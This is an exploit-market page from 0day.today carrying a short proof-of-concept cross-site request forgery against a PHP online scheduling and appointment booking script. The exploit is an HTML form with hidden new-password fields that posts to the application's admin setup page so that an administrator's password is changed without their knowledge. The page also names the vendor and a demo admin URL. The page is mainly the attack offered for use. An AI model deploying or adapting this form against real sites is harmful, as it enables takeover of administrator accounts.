[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

online scheduling CSRF (change password)

Author
Jonturk75
Risk
[
Security Risk Low
]
0day-ID
0day-ID-17741
Category
web applications
Date add
15-03-2012
Platform
php
# Exploit Title: online scheduling CSRF (change password)
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/online-scheduling-and-appointment-booking/23743/
# Category::  webapps
# Demo : http://www.softwareplusweb.com/appointmentDemo/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com





<FORM METHOD="post" ACTION="target.com/admin/index.php?links=setups" onsubmit="return validateChange(this)" >
<input type="hidden" maxlength="10" size="20" value="" name="new password"/>
<input type="hidden" maxlength="10" size="20" value="" name="retry new password"/>
<input type="button" class="button3" name="B1" value="Change"/></td>
</form>



#  0day.today [2024-10-06]  #